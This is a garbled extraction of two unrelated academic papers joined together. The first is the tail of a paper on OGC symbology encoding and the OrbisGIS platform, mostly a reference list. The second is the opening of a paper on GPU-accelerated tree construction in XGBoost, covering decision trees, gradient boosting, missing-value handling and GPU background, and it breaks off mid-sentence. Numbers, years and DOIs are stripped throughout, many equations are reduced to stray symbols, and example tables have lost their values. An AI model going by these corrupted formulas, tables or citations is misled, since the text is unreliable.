shall be associated to reference implementations, having at least one open source is also essential for the community of implementers, guiding them even more in the understanding of the standard. in this sense, orbisgis is an open source platform that has been used to prototype an implementation of the symbology model all along the standardization process by iterations with tests and validations. it might become an open source reference implementation. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � erwan bocher conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � olivier ertz conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. 
data availability the following information was supplied regarding data availability: github repository with the orbisgis platform, containing a partial implementation of the symbology rendering model: https://github.com/orbisgis/orbisgis. references andrae c, graul c, over m, zipf a. . web portrayal services: opengis web map service, styled layer descriptor, symbology encoding und iso portrayal vorgestellt und erläutert. opengis essentials: die geo-standards von ogc und iso im überblick. berlin: wichmann. oclc . bertin j, berg wj. . semiology of graphics: diagrams, networks, maps. first edition. redlands: esri press. bocher e, ertz o. . towards cartographic portrayal interoperability—the revision of ogc symbology encoding standard. in: proceedings of the st ica european symposium on cartography, vienna, austria. vol. , – . bocher e, ertz o. . ogc symbology model and encodings—the wall of maps. available at http://se.orbisgis.org (accessed september ). bocher e, ertz o, laurent m, hégron g, petit g, rappo d. . cartographie et standard: du modèle a l’utilisateur. in: proceedings of the th international cartographic conference paris, – july . paris: iccoclc. bocher e, petit g. . orbisgis: geographical information system designed by and for research. in: bucher b, ber fl, eds. innovative software development in gis. hoboken: john wiley & sons, inc., – . bocher e, petit g. . cartography—orbisgis manual . documentation. available at http://orbisgis.readthedocs.io/en/latest/users/cartography.html?highlight=symbology (accessed september ). bocher e, petit g, gueganno a, fortin n, gourlay a, ertz o. . séminaire de restitution du sogville (système d’observation géographique de la ville). technical report. available at https://halshs.archives-ouvertes.fr/halshs- (accessed september ). brackin r, gonçalves p. . ogc ows context conceptual model. technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/standards/owc (accessed september ). bruns a. . from prosumption to produsage. cheltenham: edward elgar, – . carpendale mst. . considering visual variables as a basis for information visualisation. technical report. calgary: university of calgary. cooper m, sykora p, hurni l. . the role of cartography within distributed software systems: what can we contribute? how can we prosper? in: lapaine m, association ic, eds. nd international cartographic conference and th general assembly of the ica. a coruña: international cartographic society. craglia m. . building inspire: the spatial data infrastructure for europe. arcnews : – . bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/orbisgis/orbisgis http://se.orbisgis.org http://orbisgis.readthedocs.io/en/latest/users/cartography.html?highlight=symbology https://halshs.archives-ouvertes.fr/halshs- http://www.opengeospatial.org/standards/owc http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ craig b. . ogc� ows- symbology encoding (se) changes (ogc - ). technical report. wayland: open geospatial consortium, inc. available at http://portal.opengeospatial.org/files/ ?artifact_id= (accessed september ). de la beaujardiere j. . opengis web map server implementation specification (ogc – version . . ). open geospatial consortium inc., . available at http://portal.opengeospatial. org/files/?artifact_id= (accessed september ). dietze l, zipf a. . 
extending ogc styled layer descriptor (sld) for thematic cartography— towards the ubiquitous use of advanced mapping functions through standardized visualization rules. in: th international symposium on lbs and telecartography, hong kong. duarte teixeira m, de melo cuba r, mizuta weiss g. . creating thematic maps with ogc standards through the web. in: proceedings of the gml and geo-spatial web services conference, vancouver. lemmer, the netherlands: gim international. environmental protection agency (epa). . guidance note for strategic noise mapping: guidance note for strategic noise mapping for the environmental noise regulations . technical report. wexford: environmental protection agency. available at https://www.epa.ie/ pubs/advice/noisemapping/epa% guidance% note% for% strategic% noise% mapping% (version% ).pdf (accessed september ). ertz o. . feasibility study about swiss geological symbols using the system-independent ogc sld/se standards. technical report. available at https://drive.switch.ch/index.php/s/ d aftdeaslej wa (accessed september ). ertz o, bocher e. . styled layer descriptor and symbology encoding . swg. technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/ projects/groups/sldse . swg (accessed september ). ertz o, julien lg, bocher e. . collaborative authoring and polypublication of cartographic content. in: ertz o, joost s, tonini m, eds. in: ogrs symposium proceedings. yverdon-les-bains: ogrs. ertz o, rey sj, joost s. . the open source dynamics in geospatial research and education. journal of spatial information science : – doi . /josis. . . . eurostat/regional statistics. . population on january by broad age group, sex and nuts region, females, total. available at http://ec.europa.eu/eurostat (accessed september ). field k. . a cacophony of cartography. cartographic journal ( ): – doi . / z. . geoserver. . geoserver . .x user manual. available at http://docs.geoserver.org/stable/en/ user/styling/ysld/index.html (accessed september ). hopfstock a, grünreich d. . a user-oriented map design in the sdi environment using the example of a european reference map at medium scale. in: proceedings of the th international cartographic conference. santiago de chile: icc. inspire drafting team. . d . : methodology for the development of data specifications. available at http://inspire.ec.europa.eu/reports/implementingrules/dataspecifications/d . _v . .pdf (accessed september ). inspire drafting team. . d . : generic conceptual model. available at http://inspire.ec. europa.eu/documents/data_specifications/d . _v . .pdf (accessed september ). inspire thematic working group geology. . d . .ii. inspire data specification on geology—technical guidelines. available at http://inspire.ec.europa.eu/id/document/tg/ge (accessed september ). iosifescu-enescu i. . se implementation specification change request—extensions for thematic mapping (ogc cr - ). technical report. wayland: open geospatial consortium, bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://portal.opengeospatial.org/files/?artifact_id= http://portal.opengeospatial.org/files/?artifact_id= http://portal.opengeospatial.org/files/?artifact_id= http://portal.opengeospatial.org/files/?artifact_id= https://www.epa.ie/pubs/advice/noisemapping/epa% guidance% note% for% strategic% noise% mapping% (version% ).pdf https://www.epa.ie/pubs/advice/noisemapping/epa% guidance% note% for% strategic% noise% mapping% (version% ).pdf https://www.epa.ie/pubs/advice/noisemapping/epa% guidance% note% for% strategic% noise% mapping% (version% ).pdf https://drive.switch.ch/index.php/s/d aftdeaslej wa https://drive.switch.ch/index.php/s/d aftdeaslej wa http://www.opengeospatial.org/projects/groups/sldse . swg http://www.opengeospatial.org/projects/groups/sldse . swg http://dx.doi.org/ . /josis. . . http://ec.europa.eu/eurostat http://dx.doi.org/ . / z. http://docs.geoserver.org/stable/en/user/styling/ysld/index.html http://docs.geoserver.org/stable/en/user/styling/ysld/index.html http://inspire.ec.europa.eu/reports/implementingrules/dataspecifications/d . _v . .pdf http://inspire.ec.europa.eu/documents/data_specifications/d . _v . .pdf http://inspire.ec.europa.eu/documents/data_specifications/d . _v . .pdf http://inspire.ec.europa.eu/id/document/tg/ge http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ inc. available at https://portal.opengeospatial.org/files/?artifact_id= (accessed september ). iosifescu-enescu i, hugentobler m, hurni l. . web cartography with open standards—a solution to cartographic challenges of environmental management. environmental modelling & software ( ): – doi . /j.envsoft. . . . iosifescu-enescu i, hurni l. . towards cartographic ontologies or how computers learn cartography. in: proceedings of the th international cartographic conference. moscow: icc. international organization for standardization (iso). . iso : —geographic information—portrayal. available at https://www.iso.org/standard/ .html. lalonde w. . styled layer descriptor profile of the web map service implementation specification (ogc - ). technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/standards/sld (accessed september ). lonjon a, thomasson j-j, maesano l. . modélisation xml. architecte logiciel. eyrolles edition. paris: eyrolles. lupp m. . styled layer descriptor profile of the web map service implementation specification (ogc - r ). wayland: open geospatial consortium, inc. maceachren am. . how maps work—representation, visualization, and design. new york: guilford press. macwright t. . the end of cartocss. available at https://blog.mapbox.com/the-end-of-cartocss- da d cf (accessed september ). mapbox. . cartocss. available at https://carto.com/docs/carto-engine/cartocss (accessed september ). maxence l, olivier e, erwan b, sylvain p. . ogc se custom jaxb. available at https://github. com/orbisgis/ogc-custom-jaxb (accessed september ). mays j. . using sld definitions to display charts in a deegree wms. in: foss g conference. cape town: open source geospatial foundation. mckenna j. . mapserver . . documentation: ogc support and configuration. available at http://mapserver.org/ogc/sld.html (accessed september ). mcmaster r, mcmaster s. . a history of twentieth-century american academic cartography. cartography and geographic information science ( ): – doi . / . montello dr. . cognitive map-design research in the twentieth century: theoretical and empirical approaches. cartography and geographic information science ( ): – doi . / . 
müller m. . styled layer descriptor profile of the web map service implementation specification (ogc - r ). wayland: open geospatial consortium, inc. nicolas l, christine z. . espon cartographic language—mapping guide. technical report. paris: ums riate, université paris diderot. available at http://f.hypotheses.org/wp-content/ blogs.dir/ /files/ / /task _final_ecl_mappingguide_dec .pdf (accessed september ). openstreetmap. . mapcss . . available at http://wiki.openstreetmap.org/wiki/mapcss/ . (accessed september ). ort e, mehta b. . java architecture for xml binding (jaxb). available at http://www.oracle. com/technetwork/articles/javase/index- .html (accessed september ). bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / https://portal.opengeospatial.org/files/?artifact_id= http://dx.doi.org/ . /j.envsoft. . . https://www.iso.org/standard/ .html http://www.opengeospatial.org/standards/sld https://blog.mapbox.com/the-end-of-cartocss-da d cf https://blog.mapbox.com/the-end-of-cartocss-da d cf https://carto.com/docs/carto-engine/cartocss https://github.com/orbisgis/ogc-custom-jaxb https://github.com/orbisgis/ogc-custom-jaxb http://mapserver.org/ogc/sld.html http://dx.doi.org/ . / http://dx.doi.org/ . / http://f.hypotheses.org/wp-content/blogs.dir/ /files/ / /task _final_ecl_mappingguide_dec .pdf http://f.hypotheses.org/wp-content/blogs.dir/ /files/ / /task _final_ecl_mappingguide_dec .pdf http://wiki.openstreetmap.org/wiki/mapcss/ . http://www.oracle.com/technetwork/articles/javase/index- .html http://www.oracle.com/technetwork/articles/javase/index- .html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ osgi. . the osgi alliance osgi core. technical report. san ramon: osgi alliance. available at https://osgi.org/download/r /osgi.core- . . .pdf (accessed september ). peterson gn. . gis cartography: a guide to effective map design. first edition. boca raton: crc press. policy swg. . the specification model—a standard for modular specifications (ogc - r ). technical report. wayland: open geospatial consortium, inc. available at http://www. opengeospatial.org/standards/modularspec (accessed september ). portele c. . opengis� geography markup language (gml) encoding standard, version . . (ogc - ). technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/standards/gml (accessed september ). rita e, borbinha j, martins b. . extending sld and se for cartograms. in: gsdi world conference. singapore: global spatial data infrastructure association. sae-tang a, ertz o. . towards web services dedicated to thematic mapping. osgeo journal : – . schnabel o, hurni l. . diagram markup language—a new model for symbolization in internet maps. in: proceedings of the th international cartographic conference. moscow: icc. slocum ta, macmaster rb, kessler fc, howard hh. . thematic cartography and geovisualization. third edition. upper saddle river: pearson education. steiniger s, hunter ajs. . free and open source gis software for building a spatial data infrastructure. berlin: springer, – . sykora p, schnabel o, enescu ii, hurni l. . extended cartographic interfaces for open distributed processing. cartographica: the international journal for geographic information and geovisualization ( ): – doi . /carto. . . . tóth k, portele c, illert a, lutz m, nunes de lima m. . a conceptual model for developing interoperability specifications in spatial data infrastructures. luxembourg: european commission joint research centre. tyner ja. . 
principles of map design. new york: guilford press. van den brink l, portele c, vretanos pa. . geography markup language (gml) simple features profile—with corrigendum (ogc - r ). technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/standards/gml (accessed september ). vretanos p. . opengis filter encoding . encoding standard (ogc - r and iso/dis ). technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/standards/filter (accessed september ). vretanos pa. . filter encoding implementation specification. technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/standards/filter (accessed september ). wood d, fels j. . the power of maps. mappings. new york: guilford press. zipf a. . using styled layer descriptor (sld) for the dynamic generation of user- and context-adaptive mobile maps—a technical framework. berlin: springer, – .
accelerating the xgboost algorithm using gpu computing
rory mitchell and eibe frank
department of computer science, university of waikato, hamilton, new zealand
abstract
we present a cuda-based implementation of a decision tree construction algorithm within the gradient boosting library xgboost. the tree construction algorithm is executed entirely on the graphics processing unit (gpu) and shows high performance with a variety of datasets and settings, including sparse input matrices. individual boosting iterations are parallelised, combining two approaches. an interleaved approach is used for shallow trees, switching to a more conventional radix sort-based approach for larger depths. we show speedups of between × and × using a titan x compared to a core i cpu, and . × using a titan x compared to × xeon cpus ( cores). we show that it is possible to process the higgs dataset ( million instances, features) entirely within gpu memory. the algorithm is made available as a plug-in within the xgboost library and fully supports all xgboost features including classification, regression and ranking tasks.
subjects artificial intelligence, data mining and machine learning, data science
keywords supervised machine learning, gradient boosting, gpu computing
introduction
gradient boosting is an important tool in the field of supervised learning, providing state-of-the-art performance on classification, regression and ranking tasks. xgboost is an implementation of a generalised gradient boosting algorithm that has become a tool of choice in machine learning competitions. this is due to its excellent predictive performance, highly optimised multicore and distributed machine implementation and the ability to handle sparse data. despite good performance relative to existing gradient boosting implementations, xgboost can be very time consuming to run. common tasks can take hours or even days to complete. building highly accurate models using gradient boosting also requires extensive parameter tuning. in this process, the algorithm must be run many times to explore the effect of parameters such as the learning rate and l1/l2 regularisation terms on cross validation accuracy.
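as a concrete illustration of this tuning workflow, the short python sketch below trains models with the xgboost library while varying the learning rate and the l2 regularisation term and reporting cross validation error. it is only an illustration: the data is synthetic, the parameter grid is arbitrary, and the option that selects the gpu tree construction plug-in is not shown because its name has differed between xgboost releases.

```python
# illustrative sketch of parameter tuning with the xgboost python api;
# the data is synthetic and the parameter grid is arbitrary.
import numpy as np
import xgboost as xgb

rng = np.random.RandomState(0)
X = rng.rand(1000, 10)
y = (X[:, 0] + 0.5 * X[:, 1] > 0.75).astype(int)
dtrain = xgb.DMatrix(X, label=y)

for eta in (0.05, 0.1, 0.3):              # learning rate
    for reg_lambda in (0.0, 1.0, 10.0):   # l2 regularisation on leaf weights
        params = {
            "objective": "binary:logistic",
            "eta": eta,
            "lambda": reg_lambda,
            "alpha": 0.0,                 # l1 regularisation
            "max_depth": 6,
            # a gpu-based tree updater can be selected here; the exact
            # parameter name depends on the installed xgboost version.
        }
        result = xgb.cv(params, dtrain, num_boost_round=50, nfold=5,
                        metrics="error", seed=0)
        print(eta, reg_lambda, result["test-error-mean"].iloc[-1])
```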
this paper describes and evaluates a graphics processing unit (gpu) algorithm for accelerating decision tree construction within individual boosting iterations in the single machine xgboost setting. gpus have been used to accelerate compute intensive tasks in machine learning and many other fields through the utilisation of their specialised simd architecture (coates et al., ; merrill & grimshaw, ). gpu-accelerated decision tree algorithms have been tried before with moderate success. our unique contributions are as follows. we describe a completely gpu-based implementation that scales to arbitrary numbers of leaf nodes and exhibits stable performance characteristics on a range of datasets and settings. we experiment with novel approaches to processing interleaved subsets of data on gpus and develop a massively parallel tree construction algorithm that natively handles sparse data. we also provide a feature complete implementation for classification, regression and learning to rank tasks in the open source xgboost library (https://github.com/dmlc/xgboost/tree/master/plugin/updater_gpu).
background and related work
we review the basic strategy of tree boosting for machine learning and revisit the derivation of the xgboost algorithm, before considering the execution model and memory architecture of gpus as well as languages and libraries for gpu computing. our gpu-based implementation makes extensive use of high-performance gpu primitives and we discuss these next. we briefly discuss the effect of using single-precision floating point arithmetic before reviewing related work on gpu-based induction of decision trees from data.
tree boosting algorithms
xgboost is a supervised learning algorithm that implements a process called boosting to yield accurate models. supervised learning refers to the task of inferring a predictive model from a set of labelled training examples. this predictive model can then be applied to new unseen examples. the inputs to the algorithm are pairs of training examples $(\vec{x}_1, y_1), (\vec{x}_2, y_2), \ldots, (\vec{x}_n, y_n)$ where $\vec{x}$ is a vector of features describing the example and y is its label. supervised learning can be thought of as learning a function $F(\vec{x}) = y$ that will correctly label new input instances. supervised learning may be used to solve classification or regression problems. in classification problems the label y takes a discrete (categorical) value. for example, we may wish to predict if a manufacturing defect occurs or does not occur based on attributes recorded from the manufacturing process, such as temperature or time, that are represented in $\vec{x}$. in regression problems the target label y takes a continuous value.
this can be used to frame a problem such as predicting temperature or humidity on a given day. xgboost is at its core a decision tree boosting algorithm. boosting refers to the ensemble learning technique of building many models sequentially, with each new model attempting to correct for the deficiencies in the previous model. in tree boosting each new model that is added to the ensemble is a decision tree. we explain how to construct a decision tree model and how this can be extended to generalised gradient boosting with the xgboost algorithm.
decision trees
decision tree learning is a method of predictive modelling that learns a model by repeatedly splitting subsets of the training examples (also called instances) according to some criteria. decision tree inducers are supervised learners that accept labelled training examples as an input and generate a model that may be used to predict the labels of new examples. in order to construct a decision tree, we start with the full set of training instances and evaluate all possible ways of creating a binary split among those instances based on the input features in $\vec{x}$. we choose the split that produces the most meaningful separation of the target label y. different measures can be used to evaluate the quality of a split. after finding the ‘best’ split, we can create a node in the tree that partitions training instances down the left or right branch according to some feature value. the subsets of training instances can then be recursively split to continue growing the tree to some maximum depth or until the quality of the splits is below some threshold. the leaves of the tree will contain predictions for the target label y. for categorical labels, the prediction can be set as the majority class from the training instances that end up in that leaf. for regression tasks, the label prediction can be set as the mean of the training instances in that leaf. to use the tree for prediction, we can input an unlabelled example at the root of the tree and follow the decision rules until the example reaches a leaf. the unlabelled example can be labelled according to the prediction of that leaf. figure shows an example decision tree that can predict whether or not an individual owns a house. the decision is based on their age and whether or not they have a job. the tree correctly classifies all instances from table .
figure: example decision tree.
table: example training instances.
instance | age | has job | owns house
 | | n | n
 | | y | y
 | | y | y
 | | n | n
 | | n | y
 | | y | n
decision tree algorithms typically expand nodes from the root in a greedy manner in order to maximise some criterion measuring the value of the split. for example, decision tree algorithms from the c4.5 family (quinlan, ), designed for classification, use information gain as the split criterion. information gain describes a change in entropy h from some previous state to a new state. entropy is defined as
$H(T) = -\sum_{y \in Y} P(y) \log_b P(y)$
where t is a set of labelled training instances, $y \in Y$ is an instance label and $P(y)$ is the probability of drawing an instance with label y from t.
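as a small illustration of this definition, the snippet below computes the entropy of a multiset of labels with a base-2 logarithm. the labels are arbitrary example values and the code is a minimal sketch, not part of the xgboost implementation.

```python
# minimal sketch: entropy of a multiset of labels, H(T) = -sum_y P(y) * log2 P(y)
from collections import Counter
from math import log2

def entropy(labels):
    n = len(labels)
    counts = Counter(labels)
    return -sum((c / n) * log2(c / n) for c in counts.values())

print(entropy(["y", "y", "n", "n"]))   # maximally mixed set: 1 bit
print(entropy(["y", "y", "y", "y"]))   # pure set: 0 bits
```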
information gain is defined as
$IG(T, T_{left}, T_{right}) = H(T) - \frac{n_{left}}{n_{total}} H(T_{left}) - \frac{n_{right}}{n_{total}} H(T_{right})$
here $T_{left}$ and $T_{right}$ are the subsets of t created by a decision rule. $n_{total}$, $n_{left}$ and $n_{right}$ refer to the number of examples in the respective sets. many different criteria exist for evaluating the quality of a split. any function can be used that produces some meaningful separation of the training instances with respect to the label being predicted. in order to find the split that maximises our criterion, we can enumerate all possible splits on the input instances for each feature. in the case of numerical features and assuming the data has been sorted, this enumeration can be performed in o(nm) steps, where n is the number of instances and m is the number of features. a scan is performed from left to right on the sorted instances, maintaining a running sum of labels as the input to the gain calculation. we do not consider the case of categorical features in this paper because xgboost encodes all categorical features using one-hot encoding and transforms them into numerical features. another consideration when building decision trees is how to perform regularisation to prevent overfitting. overfitting on training data leads to poor model generalisation and poor performance on test data. given a sufficiently large decision tree it is possible to generate unique decision rules for every instance in the training set such that each training instance is correctly labelled. this results in 100% accuracy on the training set but may perform poorly on new data. for this reason it is necessary to limit the growth of the tree during construction or apply pruning after construction.
gradient boosting
decision trees produce interpretable models that are useful for a variety of problems, but their accuracy can be considerably improved when many trees are combined into an ensemble model. for example, given an input instance to be classified, we can test it against many trees built on different subsets of the training set and return the mode of all predictions. this has the effect of reducing classifier error because it reduces variance in the estimate of the classifier. figure shows an ensemble of two decision trees. we can predict the output label using all trees by taking the most common class prediction or some weighted average of all predictions. ensemble learning methods can also be used to reduce the bias component in the classification error of the base learner.
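the left-to-right enumeration of candidate splits described above can be sketched as follows. this is an illustrative fragment that scores the splits of a single numeric feature with information gain while maintaining running label counts; it is not the xgboost implementation, and the toy values at the end are invented for the example.

```python
# illustrative sketch: best binary split of one numeric feature, scanning the
# instances in sorted order and keeping running sums of label counts.
from collections import Counter
from math import log2

def side_entropy(counts, total):
    # entropy of one side of the split from its label counts
    return -sum((c / total) * log2(c / total) for c in counts.values() if c)

def best_split(values, labels):
    pairs = sorted(zip(values, labels))           # sort once per feature
    n = len(pairs)
    right = Counter(y for _, y in pairs)          # running sums of label counts
    left = Counter()
    h_parent = side_entropy(right, n)
    best_gain, best_threshold = 0.0, None
    for i in range(1, n):                         # move instance i-1 to the left side
        y = pairs[i - 1][1]
        left[y] += 1
        right[y] -= 1
        if pairs[i - 1][0] == pairs[i][0]:
            continue                              # identical values cannot be separated
        gain = (h_parent
                - (i / n) * side_entropy(left, i)
                - ((n - i) / n) * side_entropy(right, n - i))
        if gain > best_gain:
            best_gain = gain
            best_threshold = (pairs[i - 1][0] + pairs[i][0]) / 2.0
    return best_threshold, best_gain

print(best_split([1.0, 2.0, 3.0, 4.0], ["n", "n", "y", "y"]))  # -> (2.5, 1.0)
```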
in practice, we approximate f(x), for example by using a depth-limited decision tree. this iterative process can be shown to be a gradient descent algorithm when the loss function is the squared error: lðy; fðxÞÞ ¼ ðy � fðxÞÞ to see this, consider that the loss over all training instances can be written as j ¼ x i lðyi; fðxiÞÞ we seek to minimise j by adjusting f(xi). the gradient for a particular instance xi is given by dj dfðxiÞ ¼ d p i lðyi; fðxiÞÞ dfðxiÞ ¼ dlðyi; fðxiÞÞ dfðxiÞ ¼ fmðxiÞ � yi figure decision tree ensemble. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we can see that the residuals are the negative gradient of the squared error loss function: f ðxÞ ¼ y � fmðxÞ ¼ � dlðy; fðxÞÞ dfðxÞ by adding a model that approximates this negative gradient to the ensemble we move closer to a local minimum of the loss function, thus implementing gradient descent. generalised gradient boosting and xgboost herein, we derive the xgboost algorithm following the explanation in chen & guestrin ( ). xgboost is a generalised gradient boosting implementation that includes a regularisation term, used to combat overfitting, as well as support for arbitrary differentiable loss functions. instead of optimising plain squared error loss, an objective function with two parts is defined, a loss function over the training set as well as a regularisation term which penalises the complexity of the model: obj ¼ x i lðyi; ŷiÞ þ x k �ðfkÞ lðyi; ŷiÞ can be any convex differentiable loss function that measures the difference between the prediction and true label for a given training instance. Ω(fk) describes the complexity of tree fk and is defined in the xgboost algorithm (chen & guestrin, ) as �ðfkÞ ¼ �t þ �w ( ) where t is the number of leaves of tree fk and w is the leaf weights (i.e. the predicted values stored at the leaf nodes). when Ω(fk) is included in the objective function we are forced to optimise for a less complex tree that simultaneously minimises lðyi; ŷiÞ. this helps to reduce overfitting. �t provides a constant penalty for each additional tree leaf and �w penalises extreme weights. � and � are user configurable parameters. given that boosting proceeds in an iterative manner we can state the objective function for the current iteration m in terms of the prediction of the previous iteration ŷi ðm� Þ adjusted by the newest tree fk: objm ¼ x i lðyi; ŷiðm� Þ þ fkðxiÞÞ þ x k �ðfkÞ we can then optimise to find the fk which minimises our objective. taking the taylor expansion of the above function to the second order allows us to easily accommodate different loss functions: objm ’ x i ½lðyi; ŷiðm� ÞÞ þ gifkðxÞ þ hifkðxÞ � þ x k �ðfkÞ þ constant mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ here, gi and hi are the first and second order derivatives respectively of the loss function for instance i: gi ¼ dlðyi; ŷiðm� ÞÞ dŷi ðm� Þ hi ¼ d lðyi; ŷiðm� ÞÞ dðŷiðm� ÞÞ note that the model ŷi ðm� Þ is left unchanged during this optimisation process. the simplified objective function with constants removed is objm ¼ x i ½gifkðxÞ þ hifkðxÞ � þ x k �ðfkÞ we can also make the observation that a decision tree predicts constant values within a leaf. fk(x) can then be represented as wq(x) where w is the vector containing scores for each leaf and q(x) maps instance x to a leaf. 
the objective function can then be modified to sum over the tree leaves and the regularisation term from eq. ( ): objm ¼ xt j¼ x i ij gi @ awqðxÞ þ x i ij hi @ aw qðxÞ þ �t þ � xt j¼ w here, ij refers to the set of training instances in leaf j. the sums of the derivatives in each leaf can be defined as follows: gj ¼ x i ij gi hj ¼ x i ij hi also note that wq(x) is a constant within each leaf and can be represented as wj. simplifying we get objm ¼ xt j¼ gjwj þ ðhj þ �Þw j � � þ �t ( ) the weight wj for each leaf minimises the objective function at @objm @wj ¼ gj þ ðhj þ �Þwj ¼ the best leaf weight wj given the current tree structure is then wj ¼ � gj hj þ � using the best wj in eq. ( ), the objective function for finding the best tree structure then becomes objm ¼ � xt j¼ g j hj þ � þ �t ( ) eq. ( ) is used in xgboost as a measure of the quality of a given tree. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ growing a tree given that it is intractable to enumerate through all possible tree structures, we greedily expand the tree from the root node. in order to evaluate the usefulness of a given split, we can look at the contribution of a single leaf node j to the objective function from eq. ( ): objleaf ¼ � g j hj þ � þ � we can then consider the contribution to the objective function from splitting this leaf into two leaves: objsplit ¼ � g jl hjl þ � þ g jr hjr þ � ! þ � the improvement to the objective function from creating the split is then defined as gain ¼ objleaf � objsplit which yields gain ¼ g l hl þ � þ g r hr þ � � ðgl þ grÞ hl þ hr þ � " # � � ( ) the quality of any given split separating a set of training instances is evaluated using the gain function in eq. ( ). the gain function represents the reduction in the objective function from eq. ( ) obtained by taking a single leaf node j and partitioning it into two leaf nodes. this can be thought of as the increase in quality of the tree obtained by creating the left and right branch as compared to simply retaining the original node. this formula is applied at every possible split point and we expand the split with maximum gain. we can continue to grow the tree while this gain value is positive. the � regularisation cost at each leaf will prevent the tree arbitrarily expanding. the split point selection is performed in o(nm) time (given n training instances and m features) by scanning left to right through all feature values in a leaf in sorted order. a running sum of gl and hl is kept as we move from left to right, as shown in table . gr and hr are inferred from this running sum and the node total. table shows an example set of instances in a leaf. we can assume we know the sums g and h within this node as these are simply the gl or gr from the parent split. therefore, we have everything we need to evaluate gain for every possible split within these instances and select the best. xgboost: data format tabular data input to a machine learning library such as xgboost or weka (hall et al., ) can be typically described as a matrix with each row representing an instance and each column representing a feature as shown in table . if f is the feature to be predicted then an input training pair ð~xi; yiÞ takes the form ((f i, f i), f i) where i is mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the instance id. a data matrix within xgboost may also contain missing values. 
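For later reference, since the split-finding kernels described below evaluate exactly these quantities, the optimal leaf weight and the split gain resulting from the derivation above are:

\[
G_j = \sum_{i \in I_j} g_i, \qquad H_j = \sum_{i \in I_j} h_i, \qquad
w_j^{*} = -\frac{G_j}{H_j + \lambda}, \qquad
\mathrm{Obj}^{(m)} = -\frac{1}{2} \sum_{j=1}^{T} \frac{G_j^2}{H_j + \lambda} + \gamma T
\]
\[
\mathrm{Gain} = \frac{1}{2}\left[ \frac{G_L^2}{H_L + \lambda} + \frac{G_R^2}{H_R + \lambda} - \frac{(G_L + G_R)^2}{H_L + H_R + \lambda} \right] - \gamma
\]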
one of the key features of xgboost is the ability to store data in a sparse format by implicitly keeping track of missing values instead of physically storing them. while xgboost does not directly support categorical variables, the ability to efficiently store and process sparse input matrices allows us to process categorical variables through one-hot encoding. table shows an example where a categorical feature with three values is instead encoded as three binary features. the zeros in a one-hot encoded data matrix can be stored as missing values. xgboost users may specify values to be considered as missing in the input matrix or directly input sparse formats such as libsvm files to the algorithm. xgboost: handling missing values representing input data using sparsity in this way has implications on how splits are calculated. xgboost’s default method of handling missing data when learning decision tree splits is to find the best ‘missing direction’ in addition to the normal threshold decision rule for numerical values. so a decision rule in a tree now contains a numeric decision rule such as f � . , but also a missing direction such as missing = right that sends all missing values down the right branch. for a one-hot encoded categorical variable where the zeros are encoded as missing values, this is equivalent to testing ‘one vs all’ splits for each category of the categorical variable. table enumerating splits. feature value . . . . . . gi . . . - . - . - . hi . . . . . . gl . . . . . - . hl . . . . . . table example data matrix. instance id f f f . . . . . . . . table sparse data matrix. instance id f f f mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the missing direction is selected as the direction which maximises the gain from eq. ( ). when enumerating through all possible split values, we can also test the effect on our gain function of sending all missing examples down the left or right branch and select the best option. this makes split selection slightly more complex as we do not know the gradient statistics of the missing values for any given feature we are working on, although we do know the sum of all the gradient statistics for the current node. the xgboost algorithm handles this by performing two scans over the input data, the second being in the reverse direction. in the first left to right scan the gradient statistics for the left direction are the scan values maintained by the scan, the gradient statistics for the right direction are the sum gradient statistics for this node minus the scan values. hence, the right direction implicitly includes all of the missing values. when scanning from right to left, the reverse is true and the left direction includes all of the missing values. the algorithm then selects the best split from either the forwards or backwards scan. graphics processing units the purpose of this paper is to describe how to efficiently implement decision tree learning for xgboost on a gpu. gpus can be thought of at a high level as having a shared memory architecture with multiple simd (single instruction multiple data) processors. these simd processors operate in lockstep typically in batches of ‘threads’ (matloff, ). gpus are optimised for high throughput and work to hide latency through the use of massive parallelism. 
this is in contrast to cpus which use multiple caches, branch prediction and speculative execution in order to optimise latency with regards to data dependencies (baxter, ). gpus have been used to accelerate a variety of tasks traditionally run on cpus, providing significant speedups for parallelisable problems with a high arithmetic intensity. of particular relevance to machine learning is the use of gpus to train extremely large neural networks. it was shown in that one billion parameter networks could be trained in a few days on three gpu machines (coates et al., ). languages and libraries the two main languages for general purpose gpu programming are cuda and opencl. cuda was chosen for the implementation discussed in this paper due to the availability of optimised and production ready libraries. the gpu tree construction algorithm would not be possible without a strong parallel primitives library. we make extensive use of scan, reduce and radix sort primitives from the cub (merrill & nvidia-labs, ) and thrust (hoberock & bell, ) libraries. these parallel primitives are described in detail in ‘parallel primitives.’ the closest equivalent to these libraries in opencl is the boost compute library. several problems were encountered when attempting to use boost compute and the performance of its sorting primitives lagged 